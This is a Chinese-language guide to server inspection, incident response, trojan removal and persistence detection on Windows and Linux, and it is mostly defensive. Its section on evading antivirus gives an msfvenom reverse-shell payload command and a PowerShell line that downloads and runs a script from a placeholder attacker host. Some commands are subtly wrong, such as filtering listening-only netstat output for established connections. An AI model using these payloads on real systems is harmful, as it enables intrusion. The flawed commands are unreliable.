网络安全实战指南：从安全巡检到权限维持的应急响应与木马查杀全(命令查收表)

目录

一、安全巡检的具体内容

1. 巡检的频率与目标是什么

2. 巡检的内容是什么以及巡检后如何加固

二、Windows环境下应急响应的主要流程

1. 流程概述及每个步骤详细解释

步骤1：隔离与遏制

步骤2：识别与分析

步骤3：清除与恢复

步骤4：日志分析

步骤5：加固与预防

2. 结合案例

三、Linux环境下应急响应的主要流程

1. 流程概述及每个步骤详细解释

步骤1：隔离与遏制

步骤2：识别与分析

步骤3：清除与恢复

步骤4：日志分析

步骤5：加固与预防

2. 结合案例

四、查杀木马的具体流程（Windows与Linux案例）

1. Windows案例：勒索木马查杀

2. Linux案例：挖矿木马查杀

五、服务器被入侵后的应急响应

1. Windows案例：Web服务器被植入后门

2. Linux案例：数据库服务器被入侵

六、权限维持的常见方式、检测与防护

1. 常见权限维持方式

Windows

Linux

2. 检测权限维持手法

Windows

Linux

3. 解决权限维持手法

Windows

Linux

4. 防护后门与权限维持

Windows

Linux

5. 绕过杀毒软件与IWAF

七、综合输出与查漏补缺

1. 综合技术手法

2. 查漏补缺

一、安全巡检的具体内容

1. 巡检的频率与目标是什么

• 频率：安全巡检通常根据系统的重要性和威胁环境确定频率。一般建议每周一次常规巡检，对于高风险系统（如对外暴露的服务器）可增加至每日一次，而低风险系统可调整为每月一次。

• 目标：发现系统中的潜在威胁，包括系统漏洞、异常行为（如未授权访问）、恶意软件以及配置错误，防止攻击者利用这些弱点入侵系统。

2. 巡检的内容是什么以及巡检后如何加固

• 巡检内容：

  1. 系统漏洞扫描：检查操作系统、应用程序是否存在已知漏洞。

  2. 日志分析：审查系统日志（如Windows Event Viewer、Linux /var/log），寻找异常登录或操作。

  3. 文件完整性检查：验证关键系统文件是否被篡改。

  4. 用户权限审计：检查是否存在异常账户或权限提升。

  5. 杀毒软件更新：确保杀毒软件签名库和版本是最新的。

• 加固措施：

  1. 修补漏洞：使用补丁管理工具（如Windows Update、yum/apt）修复漏洞。

  2. 强化用户权限：删除不必要的管理员账户，使用最小权限原则。

  3. 更新杀毒软件：确保实时防护开启，定期全盘扫描。

  4. 加密敏感数据：对关键文件和通信启用加密（如TLS、BitLocker）。

二、Windows环境下应急响应的主要流程

1. 流程概述及每个步骤详细解释

Windows应急响应通常包括以下五个步骤：

1. 隔离与遏制：阻止恶意软件扩散。

2. 识别与分析：确定攻击来源和恶意行为。

3. 清除与恢复：移除恶意软件并修复系统。

4. 日志分析：追踪攻击路径和影响。

5. 加固与预防：防止再次入侵。

步骤1：隔离与遏制

• 目的：防止恶意软件通过网络传播或进一步破坏。

• 工具与命令：

  • 断开网络：物理拔网线或运行 netsh interface set interface "Ethernet" disable。

  • 启用防火墙：netsh advfirewall set allprofiles state on。

• 详细步骤：

  1. 发现异常后立即断开受感染设备的网络连接，但保留电源以便后续分析。

  2. 如果无法物理断网，使用防火墙规则阻止外部通信。

步骤2：识别与分析

• 目的：定位恶意进程、文件和网络活动。

• 工具与命令：

  • Process Explorer：查看进程详细信息。

  • Autoruns：检查启动项。

  • netstat -ano：列出网络连接和关联进程ID。

• 详细步骤：

  1. 运行 Process Explorer，观察CPU/内存占用异常的进程，右键检查文件路径和数字签名。

  2. 使用 Autoruns，查看注册表和计划任务中的可疑启动项。

  3. 执行 netstat -ano | findstr ESTABLISHED，记录异常外部IP。

步骤3：清除与恢复

• 目的：删除恶意软件并修复系统。

• 工具与命令：

  • Malwarebytes：扫描并移除恶意软件。

  • sfc /scannow：修复系统文件。

• 详细步骤：

  1. 以安全模式启动系统（F8或msconfig）。

  2. 运行 Malwarebytes，执行全盘扫描并隔离威胁。

  3. 执行 sfc /scannow，修复被篡改的系统文件。

步骤4：日志分析

• 目的：了解攻击时间线和手法。

• 工具与命令：

  • Event Viewer：查看系统、安全日志。

  • wevtutil：导出日志，wevtutil qe Security /f:text > security.log。

• 详细步骤：

  1. 打开 Event Viewer，筛选安全日志（如事件ID 4624/4625）。

  2. 导出日志进行详细分析，查找异常登录或进程启动。

步骤5：加固与预防

• 目的：防止类似事件再次发生。

• 工具与命令：

  • Windows Update：安装补丁。

  • net user：重置密码，net user Administrator 新密码。

• 详细步骤：

  1. 运行 Windows Update 更新系统。

  2. 检查并删除异常账户，强化密码策略。

2. 结合案例

• 案例：某企业Windows服务器被勒索病毒感染。

  • 隔离：管理员发现异常后立即拔掉网线。

  • 识别：使用 Process Explorer 发现进程 svchost.exe 异常占用CPU，路径为 C:\Temp。

  • 清除：运行 Malwarebytes，隔离病毒并删除。

  • 日志分析：在 Event Viewer 中发现攻击者通过RDP（事件ID 4624）登录。

  • 加固：关闭RDP（reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f），更新补丁。

三、Linux环境下应急响应的主要流程

1. 流程概述及每个步骤详细解释

Linux应急响应流程与Windows类似，但工具和命令不同：

1. 隔离与遏制：阻止恶意软件扩散。

2. 识别与分析：定位异常进程和网络活动。

3. 清除与恢复：移除恶意软件并修复。

4. 日志分析：追踪攻击路径。

5. 加固与预防：提升安全性。

步骤1：隔离与遏制

• 目的：限制恶意软件影响范围。

• 工具与命令：

  • ifconfig down：禁用网络接口，ifconfig eth0 down。

  • iptables：阻断外部流量，iptables -A INPUT -s 恶意IP -j DROP。

• 详细步骤：

  1. 执行 ifconfig eth0 down 或拔网线。

  2. 使用 iptables 设置规则，阻止可疑IP。

步骤2：识别与分析

• 目的：找到恶意进程和连接。

• 工具与命令：

  • top：查看高占用进程。

  • ps aux：列出所有进程。

  • netstat -tuln：检查网络连接。

• 详细步骤：

  1. 运行 top，记录异常进程PID。

  2. 执行 ps aux | grep PID，查看进程详细信息。

  3. 使用 netstat -tuln | grep ESTABLISHED，记录可疑连接。

步骤3：清除与恢复

• 目的：删除恶意软件。

• 工具与命令：

  • ClamAV：扫描病毒，clamscan -r /。

  • kill：终止进程，kill -9 PID。

• 详细步骤：

  1. 使用 kill -9 PID 终止可疑进程。

  2. 运行 clamscan -r / --remove，删除恶意文件。

步骤4：日志分析

• 目的：确定攻击来源。

• 工具与命令：

  • cat /var/log/auth.log：查看登录记录。

  • journalctl：分析系统日志。

• 详细步骤：

  1. 执行 cat /var/log/auth.log | grep "Failed"，查找暴力破解痕迹。

  2. 使用 journalctl -u sshd，检查SSH登录事件。

步骤5：加固与预防

• 目的：防止再次入侵。

• 工具与命令：

  • yum/apt update：更新系统。

  • passwd：更改密码。

• 详细步骤：

  1. 执行 yum update -y 或 apt upgrade。

  2. 使用 passwd root 重置密码，启用 iptables 防护。

2. 结合案例

• 案例：Linux服务器被植入挖矿木马。

  • 隔离：执行 ifconfig eth0 down。

  • 识别：运行 top，发现进程 kswapd0 CPU占用100%，用 ps aux 确认路径 /tmp/xmrig。

  • 清除：执行 kill -9 PID 和 rm -f /tmp/xmrig。

  • 日志分析：cat /var/log/auth.log 显示SSH暴力破解成功。

  • 加固：安装 fail2ban，禁用root登录（PermitRootLogin no 在 /etc/ssh/sshd_config）。

四、查杀木马的具体流程（Windows与Linux案例）

1. Windows案例：勒索木马查杀

• 背景：2023年某企业PC感染勒索木马，文件被加密。

• 步骤：

  1. 隔离网络：

     • 工具：命令行。

     • 命令：netsh interface set interface "Ethernet" disable。

     • 操作：以管理员权限运行CMD，输入命令禁用网络。

  2. 识别木马：

     • 工具：Process Explorer、Autoruns。

     • 操作：运行 Process Explorer，发现 ransom.exe 在 C:\Users\Temp，用 Autoruns 找到注册表启动项 HKLM\Software\Microsoft\Windows\CurrentVersion\Run。

  3. 分析网络活动：

     • 工具：Wireshark。

     • 操作：启动 Wireshark，设置过滤器 ip.addr == 可疑IP，记录C2服务器地址。

  4. 清除木马：

     • 工具：Malwarebytes。

     • 操作：以安全模式运行 Malwarebytes，扫描并删除 ransom.exe。

  5. 恢复与加固：

     • 命令：sfc /scannow。

     • 操作：修复系统文件，删除启动项（reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ransom）。

2. Linux案例：挖矿木马查杀

• 背景：2023年某云服务器感染挖矿木马。

• 步骤：

  1. 隔离网络：

     • 命令：ifconfig eth0 down。

     • 操作：以root权限执行，断开网络。

  2. 识别木马：

     • 工具：top、lsof。

     • 命令：top 查看PID，lsof -p PID 确认文件 /usr/local/bin/miner。

  3. 检查网络：

     • 命令：netstat -tuln | grep ESTABLISHED。

     • 操作：发现连接至外部挖矿池IP。

  4. 清除木马：

     • 工具：ClamAV。

     • 命令：clamscan -r / --remove 删除 /usr/local/bin/miner。

  5. 加固系统：

     • 工具：fail2ban。

     • 操作：安装 fail2ban，配置 /etc/fail2ban/jail.local 阻止SSH暴力破解。

五、服务器被入侵后的应急响应

1. Windows案例：Web服务器被植入后门

• 背景：2023年某Windows IIS服务器被上传WebShell。

• 步骤：

  1. 隔离：netsh advfirewall set allprofiles state on。

  2. 检查网络：

     • 命令：netstat -ano | findstr LISTEN。

     • 操作：发现异常端口8080。

  3. 列出进程：

     • 命令：tasklist /svc。

     • 操作：找到关联进程 w3wp.exe，用 Process Explorer 确认路径 C:\inetpub\wwwroot\shell.aspx。

  4. 检查计划任务：

     • 命令：schtasks /query。

     • 操作：发现后门任务 BackdoorTask。

  5. 检查注册表：

     • 命令：reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run。

     • 操作：找到可疑键值。

  6. 清除与恢复：

     • 操作：删除 shell.aspx，运行 Malwarebytes，删除任务（schtasks /delete /tn BackdoorTask /f）。

  7. 加固：关闭不必要端口，更新IIS补丁。

2. Linux案例：数据库服务器被入侵

• 背景：2023年某Linux MySQL服务器被植入恶意脚本。

• 步骤：

  1. 隔离：iptables -A INPUT -j DROP。

  2. 检查网络：

     • 命令：ss -tuln。

     • 操作：发现异常端口9999。

  3. 列出进程：

     • 命令：ps aux | grep 9999。

     • 操作：找到进程 /tmp/backdoor.sh。

  4. 检查计划任务：

     • 命令：crontab -l。

     • 操作：发现每分钟执行 /tmp/backdoor.sh。

  5. 搜索可疑文件：

     • 命令：find / -name "*.sh" -mtime -7。

     • 操作：定位所有最近修改的脚本。

  6. 清除与恢复：

     • 操作：删除 /tmp/backdoor.sh，运行 ClamAV。

  7. 加固：禁用root SSH，安装 SELinux。

六、权限维持的常见方式、检测与防护

1. 常见权限维持方式

Windows

1. 注册表启动项：HKLM\Software\Microsoft\Windows\CurrentVersion\Run。

2. 计划任务：通过 schtasks 创建。

3. DLL劫持：替换系统DLL。

4. 服务：注册恶意服务（sc create）。

Linux

1. crontab计划任务：定时执行恶意脚本。

2. SSH密钥：添加至 ~/.ssh/authorized_keys。

3. SUID/SGID程序：设置权限提升文件。

4. 隐藏文件：如 .malware。

2. 检测权限维持手法

Windows

• 检测项：启动项、计划任务、服务、异常进程。

• 工具与命令：

  • Autoruns：检查所有启动项。

  • Sysmon：监控系统行为（需配置规则）。

Linux

• 检测项：crontab、SSH密钥、SUID文件、隐藏文件。

• 工具与命令：

  • auditd：审计系统调用。

  • find / -perm -4000：查找SUID文件。

3. 解决权限维持手法

Windows

• 命令：

  • 删除启动项：reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 键名 /f。

  • 删除任务：schtasks /delete /tn 任务名 /f。

Linux

• 命令：

  • 删除crontab：crontab -r。

  • 删除SSH密钥：rm ~/.ssh/authorized_keys。

4. 防护后门与权限维持

Windows

• 工具：AppLocker（限制程序执行）、组策略。

Linux

• 工具：SELinux（强制访问控制）、AppArmor。

5. 绕过杀毒软件与IWAF

• 方式：

  1. 免杀技术：使用Packer（如UPX）或自定义加密。

  2. 内存注入：将代码注入合法进程（如 powershell.exe）。

  3. 混淆代码：使用Base64编码或多态技术。

• 详细步骤：

  1. 编写恶意代码（如PowerShell脚本）。

  2. 使用 msfvenom 生成免杀payload：msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=4444 -f exe -o payload.exe。

  3. 注入进程：powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://攻击者IP/payload.ps1')。

七、综合输出与查漏补缺

1. 综合技术手法

• 安全巡检：漏洞扫描、日志分析、权限审计。

• 应急响应：Windows（Sysinternals、Malwarebytes）、Linux（top、ClamAV）。

• 木马查杀：行为分析、最新工具。

• 权限维持：检测（Autoruns、auditd）、防护（AppLocker、SELinux）。

2. 查漏补缺

• 最新技术：EDR/XDR、SIEM、容器安全。

• 失效技术：传统杀毒软件、手动巡检。